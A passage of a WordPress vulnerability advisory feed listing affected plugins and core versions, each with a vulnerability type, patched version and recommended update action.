Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.8.2
Recommended Action: Update to version 3.8.2, or a newer patched version

Plugin: Contact Form With Captcha

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.6.8
Recommended Action: Update to version 1.6.8, or a newer patched version

Plugin: Web3 – Crypto wallet Login & NFT token gating

Vulnerability: Authentication Bypass
Patched Version: 2.7.0
Recommended Action: Update to version 2.7.0, or a newer patched version

Plugin: WooCommerce Google Sheet Connector

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Modal Survey – WordPress Poll, Survey & Quiz Plugin

Vulnerability: PHP Object Injection
Patched Version: 2.0.1.8.2
Recommended Action: Update to version 2.0.1.8.2, or a newer patched version

Plugin: Autopost for X (formerly Autoshare for Twitter)

Vulnerability: Denial of Service
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: Shantz WordPress QOTD

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Social Proof (Testimonial) Slider

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.2.4
Recommended Action: Update to version 2.2.4, or a newer patched version

Plugin: Gwolle Guestbook

Vulnerability: Remote File Inclusion
Patched Version: 1.5.4
Recommended Action: Update to version 1.5.4, or a newer patched version

Plugin: lightbox

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.6.8
Recommended Action: Update to version 1.6.8, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Cross-Site Request Forgery to plugin deactivation
Patched Version: 2.33.4
Recommended Action: Update to version 2.33.4, or a newer patched version

Plugin: Elementor Website Builder Pro

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.10
Recommended Action: Update to version 2.0.10, or a newer patched version

Plugin: Page Builder: Pagelayer – Drag and Drop website builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.7.7
Recommended Action: Update to version 1.7.7, or a newer patched version

Plugin: WooCommerce Upload Files

Vulnerability: Arbitrary File Upload
Patched Version: 59.4
Recommended Action: Update to version 59.4, or a newer patched version

Plugin: Enqueue Anything

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Site Kit by Google – Analytics, Search Console, AdSense, Speed

Vulnerability: Sensitive Information Disclosure
Patched Version: 1.8.0
Recommended Action: Update to version 1.8.0, or a newer patched version

Plugin: Advanced Custom Fields (ACF)

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Custom Field
Patched Version: 6.2.5
Recommended Action: Update to version 6.2.5, or a newer patched version

Plugin: wpForo Forum

Vulnerability: Insecure Direct Object Reference to Forum Privacy Change
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: Metricool

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.18
Recommended Action: Update to version 1.18, or a newer patched version

Plugin: Protect uploads

Vulnerability: Authorization Bypass
Patched Version: 0.4
Recommended Action: Update to version 0.4, or a newer patched version

Plugin: Coming Soon Page – Responsive Coming Soon & Maintenance Mode

Vulnerability: Cross-Site Scripting via bg_color parameter
Patched Version: 1.1.19
Recommended Action: Update to version 1.1.19, or a newer patched version

Plugin: Appointment Hour Booking – WordPress Booking Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.46
Recommended Action: Update to version 1.1.46, or a newer patched version

Plugin: Mail Masta

Vulnerability: SQL Injection via filter_list parameter
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: HyperComments

Vulnerability: Arbitrary File Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: D-Bargain

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via settings
Patched Version: 4.0.0
Recommended Action: Update to version 4.0.0, or a newer patched version

Plugin: Easy Digital Downloads – eCommerce Payments and Subscriptions made easy

Vulnerability: Cross-Site Request Forgery via edd_trigger_upgrades
Patched Version: 3.1.2
Recommended Action: Update to version 3.1.2, or a newer patched version

Plugin: Droit Dark Mode

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Image Source Control Lite – Show Image Credits and Captions

Vulnerability: Sensitive Information Exposure via Log File
Patched Version: 2.17.1
Recommended Action: Update to version 2.17.1, or a newer patched version

Plugin: RSS Aggregator by Feedzy – Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 3.4.3
Recommended Action: Update to version 3.4.3, or a newer patched version

Plugin: Stop User Enumeration

Vulnerability: User Enumeration
Patched Version: 1.3.9
Recommended Action: Update to version 1.3.9, or a newer patched version

Plugin: Easy2Map

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: plugnedit

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 6.2.0
Recommended Action: Update to version 6.2.0, or a newer patched version

Plugin: Lava Directory Manager

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Image Gallery – Grid Gallery

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: ImageInject

Vulnerability: Authenticated (Admin+) Stored XSS
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: LightStart – Maintenance Mode, Coming Soon and Landing Page Builder

Vulnerability: Authenticated Information Disclosure
Patched Version: 2.0.7
Recommended Action: Update to version 2.0.7, or a newer patched version

Plugin: Newsletter Manager

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: Calendar

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.3.11
Recommended Action: Update to version 1.3.11, or a newer patched version

Plugin: Simple add pages or posts

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: WP Page Builder

Vulnerability: Insecure Default to Unauthorized Page Editing
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: Google Map Shortcode

Vulnerability: Cross-Site Request Forgery to Plugin Setting Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Archivist – Custom Archive Templates

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: VS Contact Form

Vulnerability: Missing Authorization
Patched Version: 14.0
Recommended Action: Update to version 14.0, or a newer patched version

Plugin: MaxGalleria

Vulnerability: Stored Cross-Site Scripting
Patched Version: 6.2.7
Recommended Action: Update to version 6.2.7, or a newer patched version

Plugin: Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 4.5.5
Recommended Action: Update to version 4.5.5, or a newer patched version

Plugin: Sitemap by BestWebSoft – WordPress XML Site Map Page Generator Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0.8
Recommended Action: Update to version 3.0.8, or a newer patched version

Plugin: Locatoraid Store Locator

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 3.9.19
Recommended Action: Update to version 3.9.19, or a newer patched version

Plugin: WP GoToWebinar

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via settings
Patched Version: 14.46
Recommended Action: Update to version 14.46, or a newer patched version

Plugin: RVM – Responsive Vector Maps

Vulnerability: Responsive Vector Maps <= 6.4.1
Patched Version: 6.4.2
Recommended Action: Update to version 6.4.2, or a newer patched version

Plugin: Contact Form 7

Vulnerability: CAPTCHA Bypass
Patched Version: 3.7.2
Recommended Action: Update to version 3.7.2, or a newer patched version

Plugin: MP3 Audio Player – Music Player, Podcast Player & Radio by Sonaar

Vulnerability: Multiple Admin+ Cross-Site Scripting
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: MobileChief

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: My wpdb

Vulnerability: Cross-Site Request Forgery to Arbitrary SQL Query Execution
Patched Version: 2.5
Recommended Action: Update to version 2.5, or a newer patched version

Plugin: Broken Link Checker | Finder

Vulnerability: Missing Authorization via moblc_auth_save_settings
Patched Version: 2.5.0
Recommended Action: Update to version 2.5.0, or a newer patched version

Plugin: Gallery – Photo Albums Plugin

Vulnerability: Multiple Cross-Site Request Forgery
Patched Version: 1.3.03
Recommended Action: Update to version 1.3.03, or a newer patched version

Plugin: WP Smart Preloader

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.15.1
Recommended Action: Update to version 1.15.1, or a newer patched version

Plugin: Leaflet Maps Marker (Google Maps, OpenStreetMap, Bing Maps)

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 3.12.5
Recommended Action: Update to version 3.12.5, or a newer patched version

Plugin: WP All Export Pro

Vulnerability: Authenticated SQL Injection
Patched Version: 1.7.9
Recommended Action: Update to version 1.7.9, or a newer patched version

Plugin: Product Vendors

Vulnerability: Missing Authorization
Patched Version: 2.2.3
Recommended Action: Update to version 2.2.3, or a newer patched version

Plugin: Structured Content (JSON-LD) #wpsc

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: Easy Coming Soon

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: AdFoxly – Ad Manager, AdSense Ads & Ads.txt

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Advance Search for WooCommerce

Vulnerability: Cross-Site Scripting
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: Etsy Shop

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.0.5
Recommended Action: Update to version 3.0.5, or a newer patched version

Plugin: DOOFINDER Search and Discovery for WP & WooCommerce

Vulnerability: Reflected Cross-Site Scripting via tab
Patched Version: 2.1.8
Recommended Action: Update to version 2.1.8, or a newer patched version

Plugin: Import and export users and customers

Vulnerability: Sensitive Data Exposure
Patched Version: 1.15.0.1
Recommended Action: Update to version 1.15.0.1, or a newer patched version

Plugin: Bad Behavior

Vulnerability: 2.2.4
Patched Version: 2.0.47
Recommended Action: Update to one of the following versions, or a newer patched version: 2.0.47, 2.2.5

Plugin: Calculated Fields Form

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.121
Recommended Action: Update to version 1.1.121, or a newer patched version

Plugin: Imagements

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Social comments by WpDevArt

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 2.5.0
Recommended Action: Update to version 2.5.0, or a newer patched version

Plugin: Blocksy Companion

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.8.68
Recommended Action: Update to version 1.8.68, or a newer patched version

Plugin: BuddyBoss Media

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.2.4
Recommended Action: Update to version 3.2.4, or a newer patched version

Plugin: Media Library Folders

Vulnerability: Cross-Site Request Forgery
Patched Version: 7.1.2
Recommended Action: Update to version 7.1.2, or a newer patched version

Plugin: SP Project & Document Manager

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 4.68
Recommended Action: Update to version 4.68, or a newer patched version

Plugin: Page View Count

Vulnerability: Unauthenticated SQL Injection
Patched Version: 2.4.15
Recommended Action: Update to version 2.4.15, or a newer patched version

Plugin: Easy Digital Downloads – eCommerce Payments and Subscriptions made easy

Vulnerability: Unauthenticated CSV Injection
Patched Version: 3.1.0.2
Recommended Action: Update to version 3.1.0.2, or a newer patched version

Plugin: WP Video Lightbox

Vulnerability: Contributor+ Stored Cross-Site Scripting
Patched Version: 1.9.3
Recommended Action: Update to version 1.9.3, or a newer patched version

Plugin: SEO Plugin by Squirrly SEO

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 11.1.12
Recommended Action: Update to version 11.1.12, or a newer patched version

Plugin: Sharebar

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: Popup Builder – Create highly converting, mobile friendly marketing popups.

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 4.2.3
Recommended Action: Update to version 4.2.3, or a newer patched version

Plugin: Find My Blocks – Locate blocks on your site

Vulnerability: Sensitive Information Disclosure
Patched Version: 3.4.0
Recommended Action: Update to version 3.4.0, or a newer patched version

Plugin: Simple Membership

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.3.6
Recommended Action: Update to version 4.3.6, or a newer patched version

Plugin: Slick Popup: Contact Form 7 Popup Plugin

Vulnerability: Privilege Escalation
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: WP Coder – Code Snippets + HTML, CSS, JS and PHP Injection

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 2.5.4
Recommended Action: Update to version 2.5.4, or a newer patched version

Plugin: VikBooking Hotel Booking Engine & PMS

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.9
Recommended Action: Update to version 1.5.9, or a newer patched version

Plugin: Coming Soon Page – Responsive Coming Soon & Maintenance Mode

Vulnerability: Cross-Site Scripting via logo_height parameter
Patched Version: 1.1.19
Recommended Action: Update to version 1.1.19, or a newer patched version

Plugin: InstaSqueeze Sexy Squeeze Pages

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: MF Gig Calendar

Vulnerability: Cross-Site Scripting
Patched Version: 0.9.5
Recommended Action: Update to version 0.9.5, or a newer patched version

Plugin: BackWPup – WordPress Backup & Restore Plugin

Vulnerability: Unauthenticated Backup Download
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: 10Web Booster – Website speed optimization, Cache & Page Speed optimizer

Vulnerability: Unauthenticated Arbitrary Option Deletion
Patched Version: 2.24.18
Recommended Action: Update to version 2.24.18, or a newer patched version

Plugin: WP Crowdfunding

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1.6
Recommended Action: Update to version 2.1.6, or a newer patched version

Plugin: WP Editor

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.6.3
Recommended Action: Update to version 1.2.6.3, or a newer patched version

Plugin: Media File Manager Advanced

Vulnerability: Improper Access Control
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Pinterest Automatic

Vulnerability: Unauthenticated Arbitrary Options Update
Patched Version: 4.14.4
Recommended Action: Update to version 4.14.4, or a newer patched version

Plugin: LearnPress – WordPress LMS Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 3.1.0
Recommended Action: Update to version 3.1.0, or a newer patched version

Plugin: Ultimate Dashboard – Custom WordPress Dashboard

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: 3.7.6
Recommended Action: Update to version 3.7.6, or a newer patched version

Plugin: Animate It!

Vulnerability: Cross-Site Scripting
Patched Version: 2.3.6
Recommended Action: Update to version 2.3.6, or a newer patched version

Plugin: Thumbnail Slider With Lightbox

Vulnerability: Cross-Site Request Forgery to Arbitrary File Upload
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: Testimonial Slider

Vulnerability: SQL Injection
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Core: WordPress

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.7.24
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.24, 3.8.24, 3.9.22, 4.0.21, 4.1.21, 4.2.18, 4.3.14, 4.4.13, 4.5.12, 4.6.9, 4.7.8, 4.8.4, 4.9.1

Plugin: Wicked Folders

Vulnerability: Cross-Site Request Forgery via ajax_unassign_folders
Patched Version: 2.18.17
Recommended Action: Update to version 2.18.17, or a newer patched version

Plugin: WPCode – Insert Headers and Footers + Custom Code Snippets – WordPress Code Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.9
Recommended Action: Update to version 2.0.9, or a newer patched version

Plugin: Awesome Support – WordPress HelpDesk & Support Plugin

Vulnerability: Cross-Site Scripting via post_title
Patched Version: 6.0.14
Recommended Action: Update to version 6.0.14, or a newer patched version

Plugin: Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.16
Recommended Action: Update to version 3.2.16, or a newer patched version

Plugin: Simple Membership

Vulnerability: Account Takeover via Password Reset
Patched Version: 4.3.5
Recommended Action: Update to version 4.3.5, or a newer patched version

Plugin: User Private Files – File Upload & Download Manager with Secure File Sharing

Vulnerability: Insecure Direct Object Reference
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: Quizlord

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Backdoor
Patched Version: 2.2.2
Recommended Action: Update to version 2.2.2, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Privilege Escalation
Patched Version: 2.0.40
Recommended Action: Update to version 2.0.40, or a newer patched version

Plugin: MyCryptoCheckout – Bitcoin, Ethereum, and 100+ altcoins for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.126
Recommended Action: Update to version 2.126, or a newer patched version

Plugin: Forminator Forms – Contact Form, Payment Form & Custom Form Builder

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.14.12
Recommended Action: Update to version 1.14.12, or a newer patched version

Plugin: Poll Maker – Versus Polls, Anonymous Polls, Image Polls

Vulnerability: Authenticated (Admin+) Server-Side Request Forgery
Patched Version: 4.6.3
Recommended Action: Update to version 4.6.3, or a newer patched version

Plugin: Contact Bank – Contact Form Builder for WordPress

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.0.70
Recommended Action: Update to version 2.0.70, or a newer patched version

Plugin: Post Duplicator

Vulnerability: Missing Authorization via mtphr_duplicate_post
Patched Version: 2.32
Recommended Action: Update to version 2.32, or a newer patched version

Plugin: Product Visibility by Country for WooCommerce

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: podpress

Vulnerability: Cross-Site Scripting via playerID
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Apptivo Business Site CRM

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.0.14
Recommended Action: Update to version 3.0.14, or a newer patched version

Plugin: Directorist: AI-Powered WordPress Business Directory Plugin with Classified Ads Listings

Vulnerability: Authenticated (Administrator+) Local File Inclusion
Patched Version: 7.5.4
Recommended Action: Update to version 7.5.4, or a newer patched version

Plugin: Woody code snippets – Insert Header Footer Code, AdSense Ads

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 2.3.10
Recommended Action: Update to version 2.3.10, or a newer patched version

Plugin: E2Pdf – Export Pdf Tool for WordPress

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.16.45
Recommended Action: Update to version 1.16.45, or a newer patched version

Plugin: Coming Soon Page – Responsive Coming Soon & Maintenance Mode

Vulnerability: Cross-Site Scripting via coming-soon_sub_title parameter
Patched Version: 1.1.19
Recommended Action: Update to version 1.1.19, or a newer patched version

Plugin: Affiliate Ads for cbAds.com

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.31
Recommended Action: Update to version 1.31, or a newer patched version

Plugin: Simple Share Buttons Adder

Vulnerability: Cross-Site Request Forgery
Patched Version: 8.4.7
Recommended Action: Update to version 8.4.7, or a newer patched version

Plugin: WP Custom Admin Interface

Vulnerability: Authenticated (Administrator+) PHP Object Injection
Patched Version: 7.29
Recommended Action: Update to version 7.29, or a newer patched version

Plugin: Wp-ImageZoom

Vulnerability: SQL Injection
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Display Widgets

Vulnerability: SEO Spam Injection (Hidden Functionality)
Patched Version: 2.7
Recommended Action: Update to version 2.7, or a newer patched version

Plugin: All-in-One WP Migration and Backup

Vulnerability: Directory Traversal to File Deletion on Windows Hosts
Patched Version: 7.59
Recommended Action: Update to version 7.59, or a newer patched version

Plugin: WP ERP | Complete HR solution with recruitment & job listings | WooCommerce CRM & Accounting

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.12.4
Recommended Action: Update to version 1.12.4, or a newer patched version

Plugin: Alter

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: RAYS Grid

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: Update Theme and Plugins from Zip File

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: SpiderCalendar

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4.14
Recommended Action: Update to version 1.4.14, or a newer patched version

Plugin: Syndication Links

Vulnerability: DOM-based Cross-Site Scripting
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: Donate by BestWebSoft – Donations Acception Extention for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: flowpaper

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: FormCraft

Vulnerability: SQL Injection
Patched Version: 1.3.8
Recommended Action: Update to version 1.3.8, or a newer patched version

Plugin: CHP Ads Block Detector

Vulnerability: Cross-Site Request Forgery via chp_abd_action
Patched Version: 3.9.8
Recommended Action: Update to version 3.9.8, or a newer patched version

Plugin: Backup Bank: WordPress Backup Plugin

Vulnerability: Missing Authorization via post_user_feedback_backup_bank
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Like Button Rating ♥ LikeBtn

Vulnerability: Arbitrary e-mail Sending
Patched Version: 2.6.45
Recommended Action: Update to version 2.6.45, or a newer patched version

Plugin: Advanced Custom Fields (ACF)

Vulnerability: File Upload
Patched Version: 5.12.3
Recommended Action: Update to version 5.12.3, or a newer patched version

Plugin: Mediamatic – Media Library Folders

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Plugin for Google Reviews

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2.3
Recommended Action: Update to version 2.2.3, or a newer patched version

Plugin: Responsive Gallery Grid

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.3.9
Recommended Action: Update to version 2.3.9, or a newer patched version

Plugin: Everest Forms – Build Contact Forms, Surveys, Polls, Quizzes, Newsletter & Application Forms, and Many More with Ease!

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.8.0
Recommended Action: Update to version 1.8.0, or a newer patched version

Plugin: YaySMTP – WP SMTP Plugin with Full Email Log & 15+ SMTP Services

Vulnerability: Sensitive Information Disclosure
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Plugin: Z-URL Preview

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Core: WordPress

Vulnerability: Informational
Patched Version: No patched version available
Recommended Action: No known patch available. Review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance.

Plugin: Download Monitor

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.3.5.9
Recommended Action: Update to version 3.3.5.9, or a newer patched version

Plugin: Image Optimizer by 10web – Image Optimizer and Compression plugin

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.0.27
Recommended Action: Update to version 1.0.27, or a newer patched version

Plugin: Kwayy HTML Sitemap

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.0
Recommended Action: Update to version 4.0, or a newer patched version

Plugin: core plugin for kitestudio themes

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: BannerMan

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Stock Locations for WooCommerce

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via settings
Patched Version: 2.6.0
Recommended Action: Update to version 2.6.0, or a newer patched version

Plugin: Keyring

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.1
Recommended Action: Update to version 1.5.1, or a newer patched version

Plugin: DupeOff

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Cookie Notification Plugin for WordPress – WP Cookie User Info

Vulnerability: SQL Injection
Patched Version: 1.0.9
Recommended Action: Update to version 1.0.9, or a newer patched version

Plugin: Simple File List

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via settings
Patched Version: 6.1.10
Recommended Action: Update to version 6.1.10, or a newer patched version

Plugin: Homepage Pop-up

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Cross-Site Request Forgery via Uploading Flash File
Patched Version: 3.7.17
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.17, 3.8.17, 3.9.15, 4.0.14, 4.1.14, 4.2.11, 4.3.7, 4.4.6, 4.5.5, 4.6.2, 4.7.1

Plugin: SyntaxHighlighter Evolved

Vulnerability: Cross-Site Scripting
Patched Version: 3.1.10
Recommended Action: Update to version 3.1.10, or a newer patched version

Plugin: Custom Base Terms

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via ‘base’
Patched Version: 1.0.3
Recommended Action: Update to version 1.0.3, or a newer patched version

Plugin: Our Services Showcase

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Jetpack – WP Security, Backup, Speed, & Growth

Vulnerability: Improper Authorization via WPCom External Media REST endpoints
Patched Version: 12.7
Recommended Action: Update to version 12.7, or a newer patched version

Plugin: WP Site Protect

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
